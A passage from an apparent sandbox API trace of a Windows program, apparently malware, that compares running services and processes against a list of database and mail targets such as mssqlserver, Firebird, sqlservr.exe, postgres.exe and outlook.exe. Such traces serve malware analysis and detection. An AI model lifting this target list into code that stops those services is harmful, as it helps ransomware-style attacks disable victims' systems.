(lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0046.916] lstrlenW (lpString="EventSystem") returned 11 [0046.916] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0046.916] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0046.916] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0046.916] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0046.916] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0046.916] lstrlenW (lpString="gpsvc") returned 5 [0046.917] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0046.917] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0046.917] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0046.917] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0046.917] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0046.917] lstrlenW (lpString="iphlpsvc") returned 8 [0046.917] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0046.917] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0046.917] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0046.917] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0046.917] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0046.917] lstrlenW (lpString="LanmanServer") returned 12 [0046.917] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0046.917] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0046.917] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0046.917] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0046.917] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0046.917] lstrlenW (lpString="LanmanWorkstation") returned 17 [0046.917] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0046.917] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0046.917] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0046.917] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0046.917] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0046.917] lstrlenW (lpString="lmhosts") returned 7 [0046.917] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0046.917] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0046.917] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0046.917] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0046.917] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0046.917] lstrlenW (lpString="MMCSS") returned 5 [0046.917] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0046.917] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0046.917] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0046.917] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0046.917] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0046.917] lstrlenW (lpString="MpsSvc") returned 6 [0046.918] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0046.918] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0046.918] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0046.918] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0046.918] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0046.918] lstrlenW (lpString="Netman") returned 6 [0046.918] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0046.918] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0046.918] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0046.918] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0046.918] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0046.918] lstrlenW (lpString="netprofm") returned 8 [0046.918] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0046.918] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0046.918] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0046.918] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0046.918] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0046.918] lstrlenW (lpString="NlaSvc") returned 6 [0046.918] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0046.918] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0046.918] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0046.918] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0046.918] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0046.918] lstrlenW (lpString="nsi") returned 3 [0046.918] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0046.918] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0046.918] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0046.918] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0046.918] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0046.918] lstrlenW (lpString="PcaSvc") returned 6 [0046.918] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0046.918] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0046.918] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0046.918] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0046.918] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0046.918] lstrlenW (lpString="PlugPlay") returned 8 [0046.919] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0046.919] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0046.919] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0046.919] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0046.919] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0046.919] lstrlenW (lpString="Power") returned 5 [0046.919] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0046.919] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0046.919] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0046.919] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0046.919] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0046.919] lstrlenW (lpString="ProfSvc") returned 7 [0046.919] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0046.919] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0046.919] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0046.919] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0046.919] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0046.919] lstrlenW (lpString="RpcEptMapper") returned 12 [0046.919] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0046.919] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0046.919] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0046.919] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0046.919] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0046.919] lstrlenW (lpString="RpcSs") returned 5 [0046.919] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0046.919] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0046.919] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0046.919] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0046.919] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0046.919] lstrlenW (lpString="SamSs") returned 5 [0046.919] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0046.919] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0046.919] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0046.919] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0046.919] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0046.920] lstrlenW (lpString="Schedule") returned 8 [0046.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0046.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0046.920] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0046.920] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0046.920] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0046.920] lstrlenW (lpString="SENS") returned 4 [0046.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0046.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0046.920] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0046.920] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0046.920] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0046.920] lstrlenW (lpString="ShellHWDetection") returned 16 [0046.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0046.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0046.920] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0046.920] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0046.920] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0046.920] lstrlenW (lpString="Spooler") returned 7 [0046.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0046.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0046.920] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0046.920] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0046.920] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0046.920] lstrlenW (lpString="swprv") returned 5 [0046.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0046.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0046.920] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0046.920] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0046.920] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0046.920] lstrlenW (lpString="SysMain") returned 7 [0046.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0046.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0046.920] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0046.920] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0046.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0046.921] lstrlenW (lpString="Themes") returned 6 [0046.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0046.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0046.921] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0046.921] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0046.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0046.921] lstrlenW (lpString="TrkWks") returned 6 [0046.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0046.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0046.921] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0046.921] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0046.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0046.921] lstrlenW (lpString="UxSms") returned 5 [0046.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0046.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0046.921] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0046.921] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0046.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0046.921] lstrlenW (lpString="VSS") returned 3 [0046.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0046.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0046.921] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0046.921] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0046.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0046.921] lstrlenW (lpString="WdiServiceHost") returned 14 [0046.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0046.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0046.921] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0046.921] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0046.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0046.921] lstrlenW (lpString="WdiSystemHost") returned 13 [0046.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0046.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0046.921] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0046.921] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0046.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0046.922] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0046.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0046.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0046.922] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0046.922] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0046.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0046.922] lstrlenW (lpString="Winmgmt") returned 7 [0046.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0046.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0046.922] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0046.922] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0046.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0046.922] lstrlenW (lpString="WPDBusEnum") returned 10 [0046.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0046.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0046.922] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0046.922] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0046.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0046.922] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x628500 | out: hHeap=0x5d0000) returned 1 [0046.922] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f0 [0046.929] Process32FirstW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0046.930] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0046.930] lstrlenW (lpString="System") returned 6 [0046.930] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0046.930] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0046.930] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0046.930] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0046.930] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0046.930] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0046.930] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0046.930] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0046.931] lstrlenW (lpString="smss.exe") returned 8 [0046.931] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0046.931] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0046.931] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0046.931] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0046.931] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0046.931] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0046.931] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0046.931] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0046.932] lstrlenW (lpString="csrss.exe") returned 9 [0046.932] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0046.932] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0046.932] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0046.932] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0046.932] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0046.932] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0046.932] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0046.932] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0046.933] lstrlenW (lpString="wininit.exe") returned 11 [0046.933] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0046.933] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0046.933] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0046.933] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0046.934] lstrlenW (lpString="csrss.exe") returned 9 [0046.934] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0046.934] lstrlenW (lpString="winlogon.exe") returned 12 [0046.934] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0046.935] lstrlenW (lpString="services.exe") returned 12 [0046.935] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0046.936] lstrlenW (lpString="lsass.exe") returned 9 [0046.936] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0046.936] lstrlenW (lpString="lsm.exe") returned 7 [0046.936] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.937] lstrlenW (lpString="svchost.exe") returned 11 [0046.937] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.938] lstrlenW (lpString="svchost.exe") returned 11 [0046.938] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.938] lstrlenW (lpString="svchost.exe") returned 11 [0046.938] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.939] lstrlenW (lpString="svchost.exe") returned 11 [0046.939] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.940] lstrlenW (lpString="svchost.exe") returned 11 [0046.940] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0046.940] lstrlenW (lpString="audiodg.exe") returned 11 [0046.940] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.941] lstrlenW (lpString="svchost.exe") returned 11 [0046.941] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.942] lstrlenW (lpString="svchost.exe") returned 11 [0046.942] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0046.942] lstrlenW (lpString="dwm.exe") returned 7 [0046.942] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0046.943] lstrlenW (lpString="explorer.exe") returned 12 [0046.943] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0046.944] lstrlenW (lpString="spoolsv.exe") returned 11 [0046.944] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0046.944] lstrlenW (lpString="taskhost.exe") returned 12 [0046.944] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.945] lstrlenW (lpString="svchost.exe") 